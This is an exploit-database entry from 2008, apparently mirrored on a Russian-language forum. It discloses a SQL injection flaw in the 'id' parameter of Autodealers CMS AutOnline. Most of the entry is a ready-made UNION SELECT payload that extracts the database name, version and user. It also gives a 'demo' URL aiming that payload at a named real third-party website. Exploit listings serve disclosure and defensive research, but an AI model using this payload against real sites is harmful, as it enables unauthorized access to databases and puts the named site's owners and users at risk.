- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6433
- Проверка EDB
-
- Пройдено
- Автор
- ZORLU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4074 cve-2008-4073
- Дата публикации
- 2008-09-11
Код:
############################################################################################################
[+] Autodealers CMS AutOnline (id) SQL Injection Vulnerability
[+] Discovered By ZoRLu
[+] home: z0rlu.blogspot.com & yildirimordulari.org & r00tsecurity.org & darkc0de.org
[+] Greetz: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
[+] [email protected] & [email protected]
############################################################################################################
[+]
[+]
[+]
[+]
exploit:
http://localhost/script_path/index.php?page=detail&id=[SQL]
[+]
[+]
[+]
[+]
[SQL]=
ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*
[+]
[+]
[+]
[+]
[+]
demo:
http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=detail&id=ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*
[+]
[+]
[+]
[+]
############################################################################################################
# milw0rm.com [2008-09-11]- Источник
- www.exploit-db.com
